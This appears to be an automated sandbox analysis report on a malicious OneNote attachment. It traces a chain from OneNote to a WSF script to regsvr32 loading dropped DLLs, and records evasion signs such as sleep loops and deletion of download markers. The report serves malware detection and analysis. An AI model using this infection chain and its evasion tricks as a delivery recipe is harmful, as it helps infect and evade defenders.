Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007380CC 3_2_007380CC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074A8B0 3_2_0074A8B0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007594BC 3_2_007594BC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073DCB8 3_2_0073DCB8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007398AC 3_2_007398AC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073AC94 3_2_0073AC94
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074CC84 3_2_0074CC84
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00745880 3_2_00745880
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00734C84 3_2_00734C84
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00737530 3_2_00737530
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074B130 3_2_0074B130
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00736138 3_2_00736138
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00741924 3_2_00741924
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00744D20 3_2_00744D20
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074AD28 3_2_0074AD28
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00759910 3_2_00759910
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00747518 3_2_00747518
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00758500 3_2_00758500
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074610C 3_2_0074610C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074D5F0 3_2_0074D5F0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007415C8 3_2_007415C8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007395BC 3_2_007395BC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074BDA0 3_2_0074BDA0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00740A70 3_2_00740A70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00733274 3_2_00733274
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073A660 3_2_0073A660
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073B258 3_2_0073B258
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073F65C 3_2_0073F65C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074A244 3_2_0074A244
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00748A2C 3_2_00748A2C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00740E2C 3_2_00740E2C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074662C 3_2_0074662C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073BA2C 3_2_0073BA2C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00734214 3_2_00734214
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073461C 3_2_0073461C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00745A00 3_2_00745A00
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00758A00 3_2_00758A00
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074020C 3_2_0074020C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00748E08 3_2_00748E08
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00733E0C 3_2_00733E0C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007392F0 3_2_007392F0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007496D4 3_2_007496D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074EAC0 3_2_0074EAC0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073D6CC 3_2_0073D6CC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074A6BC 3_2_0074A6BC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073AAB8 3_2_0073AAB8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00734EB8 3_2_00734EB8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00733ABC 3_2_00733ABC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073BE90 3_2_0073BE90
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00744A90 3_2_00744A90
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00754E8C 3_2_00754E8C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00738A8C 3_2_00738A8C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074D770 3_2_0074D770
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074CF70 3_2_0074CF70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00738378 3_2_00738378
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073F77C 3_2_0073F77C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074E750 3_2_0074E750
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00734758 3_2_00734758
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073975C 3_2_0073975C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073D33C 3_2_0073D33C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00743B14 3_2_00743B14
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074E310 3_2_0074E310
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073EF14 3_2_0073EF14
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00744F18 3_2_00744F18
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073A7F0 3_2_0073A7F0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007527EC 3_2_007527EC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00743FD0 3_2_00743FD0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00732FD4 3_2_00732FD4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007333D4 3_2_007333D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007497CC 3_2_007497CC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00738FB0 3_2_00738FB0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073FFB8 3_2_0073FFB8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00748BB8 3_2_00748BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073DBA0 3_2_0073DBA0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00731B94 3_2_00731B94
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00745384 3_2_00745384
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_02460000 4_2_02460000
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A6E42 4_2_024A6E42
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C0618 4_2_024C0618
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B76A8 4_2_024B76A8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A9B79 4_2_024A9B79
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A8BC8 4_2_024A8BC8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B8FC8 4_2_024B8FC8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B3FD0 4_2_024B3FD0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A63F4 4_2_024A63F4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C73A4 4_2_024C73A4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A640A 4_2_024A640A
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024ACC14 4_2_024ACC14
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B08CC 4_2_024B08CC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A7D6C 4_2_024A7D6C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C6E48 4_2_024C6E48
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BA244 4_2_024BA244
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AB258 4_2_024AB258
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AF65C 4_2_024AF65C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AA660 4_2_024AA660
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B0A70 4_2_024B0A70
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A3274 4_2_024A3274
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B8E08 4_2_024B8E08
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A3E0C 4_2_024A3E0C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B020C 4_2_024B020C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B5A00 4_2_024B5A00
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C8A00 4_2_024C8A00
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A461C 4_2_024A461C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A4214 4_2_024A4214
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024ABA2C 4_2_024ABA2C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B8A2C 4_2_024B8A2C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B0E2C 4_2_024B0E2C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B662C 4_2_024B662C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A263C 4_2_024A263C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AD6CC 4_2_024AD6CC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BEAC0 4_2_024BEAC0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B96D4 4_2_024B96D4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C36FC 4_2_024C36FC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A92F0 4_2_024A92F0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C4E8C 4_2_024C4E8C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A8A8C 4_2_024A8A8C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C2E84 4_2_024C2E84
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024ABE90 4_2_024ABE90
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B4A90 4_2_024B4A90
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AAAB8 4_2_024AAAB8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A4EB8 4_2_024A4EB8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A3ABC 4_2_024A3ABC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BA6BC 4_2_024BA6BC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C2AB0 4_2_024C2AB0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A4758 4_2_024A4758
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A975C 4_2_024A975C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BE750 4_2_024BE750
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C8B68 4_2_024C8B68
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A8378 4_2_024A8378
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AF77C 4_2_024AF77C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BD770 4_2_024BD770
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BCF70 4_2_024BCF70
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C5B1C 4_2_024C5B1C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B4F18 4_2_024B4F18
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BE310 4_2_024BE310
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C8310 4_2_024C8310
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AEF14 4_2_024AEF14
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B3B14 4_2_024B3B14
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AD33C 4_2_024AD33C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B97CC 4_2_024B97CC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A2FD4 4_2_024A2FD4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A33D4 4_2_024A33D4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C27EC 4_2_024C27EC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BFFFC 4_2_024BFFFC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AA7F0 4_2_024AA7F0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B5384 4_2_024B5384
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A1B94 4_2_024A1B94
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C47A8 4_2_024C47A8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024ADBA0 4_2_024ADBA0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AFFB8 4_2_024AFFB8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B8BB8 4_2_024B8BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A8FB0 4_2_024A8FB0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BC44C 4_2_024BC44C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A7840 4_2_024A7840
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BC058 4_2_024BC058
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C5450 4_2_024C5450
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C5868 4_2_024C5868
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BB460 4_2_024BB460
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A2C78 4_2_024A2C78
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AC078 4_2_024AC078
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AB07C 4_2_024AB07C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B6C70 4_2_024B6C70
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AD474 4_2_024AD474
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A9408 4_2_024A9408
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A7C08 4_2_024A7C08
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A1000 4_2_024A1000
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BA000 4_2_024BA000
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C181C 4_2_024C181C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A7410 4_2_024A7410
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AB83C 4_2_024AB83C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B1030 4_2_024B1030
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BEC30 4_2_024BEC30
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A80CC 4_2_024A80CC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AF8C4 4_2_024AF8C4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B5CC4 4_2_024B5CC4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A18DC 4_2_024A18DC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C1CD4 4_2_024C1CD4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A14D4 4_2_024A14D4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B3CD4 4_2_024B3CD4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B20E0 4_2_024B20E0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A90F8 4_2_024A90F8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A48FC 4_2_024A48FC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A3CF4 4_2_024A3CF4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C488C 4_2_024C488C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B5880 4_2_024B5880
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A4C84 4_2_024A4C84
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BCC84 4_2_024BCC84
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B709C 4_2_024B709C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C1494 4_2_024C1494
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024AAC94 4_2_024AAC94
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C44A8 4_2_024C44A8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A98AC 4_2_024A98AC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C94BC 4_2_024C94BC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024ADCB8 4_2_024ADCB8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BA8B0 4_2_024BA8B0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C4D64 4_2_024C4D64
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B610C 4_2_024B610C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C8500 4_2_024C8500
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C2100 4_2_024C2100
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B7518 4_2_024B7518
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C9910 4_2_024C9910
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BAD28 4_2_024BAD28
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B4D20 4_2_024B4D20
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B1924 4_2_024B1924
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A6138 4_2_024A6138
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BB130 4_2_024BB130
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024B15C8 4_2_024B15C8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BD5F0 4_2_024BD5F0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BBDA0 4_2_024BBDA0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A95BC 4_2_024A95BC
Contains functionality to call native functions
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory, 3_2_0000000180010C10
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert, 3_2_0000000180010AC0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject, 3_2_0000000180010DB0
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
Source: Insight_Medical_Publishing.one ReversingLabs: Detection: 30%
Source: Insight_Medical_Publishing.one Virustotal: Detection: 40%
Source: C:\Windows\SysWOW64\wscript.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing.one
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\CRCPqQPgWxqcgJu\zBLf.dll"
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\CRCPqQPgWxqcgJu\zBLf.dll" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE File created: C:\Users\user\Documents\{F00B6BB3-41EE-4892-B100-C863D7550BEA} Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE File created: C:\Users\user\AppData\Local\Temp\{2EB17D8E-6B60-400B-AE6E-E660500E7C76} - OProcSessId.dat Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winONE@9/11@1/49
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE File read: C:\Program Files (x86)\desktop.ini Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00738BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification, 3_2_00738BC8
Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdbain.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: OneNote15WatsonLog.etl.0.dr
Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180005C69 push rdi; ret 3_2_0000000180005C72
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800056DD push rdi; ret 3_2_00000001800056E4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073A0FC push ebp; iretd 3_2_0073A0FD
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007480D7 push ebp; retf 3_2_007480D8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00736CDE push esi; iretd 3_2_00736CDF
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00736C9F pushad ; ret 3_2_00736CAA
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00739D51 push ebp; retf 3_2_00739D5A
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00748157 push ebp; retf 3_2_00748158
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00747D4E push ebp; iretd 3_2_00747D4F
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00747D3C push ebp; retf 3_2_00747D3D
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00747D25 push 4D8BFFFFh; retf 3_2_00747D2A
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073A1D2 push ebp; iretd 3_2_0073A1D3
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00747987 push ebp; iretd 3_2_0074798F
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073A26E push ebp; ret 3_2_0073A26F
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00747EAF push 458BCC5Ah; retf 3_2_00747EBC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00739E8B push eax; retf 3_2_00739E8E
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074C731 push esi; iretd 3_2_0074C732
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BC731 push esi; iretd 4_2_024BC732
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A6CDE push esi; iretd 4_2_024A6CDF
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A6C9F pushad ; ret 4_2_024A6CAA
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C6D34 push edi; ret 4_2_024C6D36
PE file contains sections with non-standard names
Source: rad0767A.tmp.dll.1.dr Static PE information: section name: _RDATA
Registers a DLL
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll
Drops PE files
Source: C:\Windows\SysWOW64\wscript.exe File created: C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\CRCPqQPgWxqcgJu\zBLf.dll (copy) Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\CRCPqQPgWxqcgJu\zBLf.dll (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\CRCPqQPgWxqcgJu\zBLf.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\wscript.exe TID: 6104 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 6108 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 4916 Thread sleep time: -270000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\System32\regsvr32.exe API coverage: 8.0 %
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008D28 FindFirstFileExW, 3_2_0000000180008D28
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
